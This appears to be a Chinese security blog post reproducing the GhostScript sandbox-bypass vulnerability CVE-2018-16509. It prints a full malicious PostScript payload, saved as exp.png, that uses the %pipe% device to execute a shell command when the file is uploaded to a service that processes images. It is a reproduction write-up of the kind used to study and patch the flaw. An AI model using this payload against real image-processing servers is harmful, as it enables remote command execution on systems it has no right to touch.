GhostScript 沙箱绕过(命令执行)漏洞


GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

8月21号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞:

漏洞复现

上传exp.png,将执行命令touch /tmp/success
exp.png:

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/success) currentdevice putdeviceprops

可见,命令成功执行。


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116) GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏
2019-02-16
下一篇 
PHP-FPM Fastcgi 未授权访问漏洞 PHP-FPM Fastcgi 未授权访问漏洞
PHP-FPM Fastcgi 未授权访问漏洞fastcgiFastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。 HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组
2019-02-16
  目录